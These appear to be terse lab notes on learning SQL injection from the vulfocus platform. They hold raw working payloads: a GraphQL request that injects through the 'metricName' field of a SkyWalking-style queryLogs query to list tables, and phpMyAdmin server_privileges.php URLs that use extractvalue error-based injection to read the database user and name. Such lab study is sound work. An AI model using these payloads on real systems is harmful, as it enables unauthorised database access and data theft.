SQL注入漏洞学习

http://vulfocus.io/#/dashboard

union all select DATABASE()

select DATABASE()

converting \"SKYWALKING-OAP-DB\"

message":"Exception while fetching data (/queryLogs) : Data conversion error converting \"SKYWALKING-OAP-DB\";

SQL statement:\nselect count(1) total from (select 1 from INFORMATION_SCHEMA.USERS union all select DATABASE())a where 1=? or 1=? or 1=? -- where  1=1  and endpoint_id = ? and status_code = ? and trace_id = ? ) [22018-196]"}

queryLogs

 

INFORMATION_SCHEMA.USERS  1 order by 5)a

 

 

 

 

POST /graphql HTTP/1.1
Host:192.168.8.230:56464
Content-Type: application/json;charset=utf-8
Content-Length: 691
Connection: close

{
"query":"query queryLogs($condition: LogQueryCondition) {
queryLogs(condition: $condition) {
total
logs {
serviceId
serviceName
isError
content
}
}
}
",
"variables":{
"condition":{
"metricName":"INFORMATION_SCHEMA.USERS union select 1,group_concat(table_name) from information_schema.tables where table_schema='SKYWALKING-OAP-DB')a where 1=? or 1=? or 1=? --",
"endpointId":"1",
"traceId":"1",
"state":"ALL",
"stateCode":"1",
"paging":{
"pageSize":10
}
}
}
}

 

 

 

 

 

 

 

 

&token=47245172262b2b247668267b39553e75

 

http://123.58.236.76:22356/pma/db_search.php?db=information_schema

 

http://123.58.236.76:22356/pma/server_privileges.php?ajax_request=true&validate_username=1&username=1%27and%20extractvalue(1,concat(0x7e,(select%20user()),0x7e))%E2%80%93+db=&token=47245172262b2b247668267b39553e75&viewing_mode=server

 

 

http://123.58.236.76:22356/pma/server_privileges.php?ajax_request=true&validate_username=1&username=1%27and%20extractvalue(1,concat(0x7e,(select%20database()),0x7e))–+db=&token=47245172262b2b247668267b39553e75&viewing_mode=server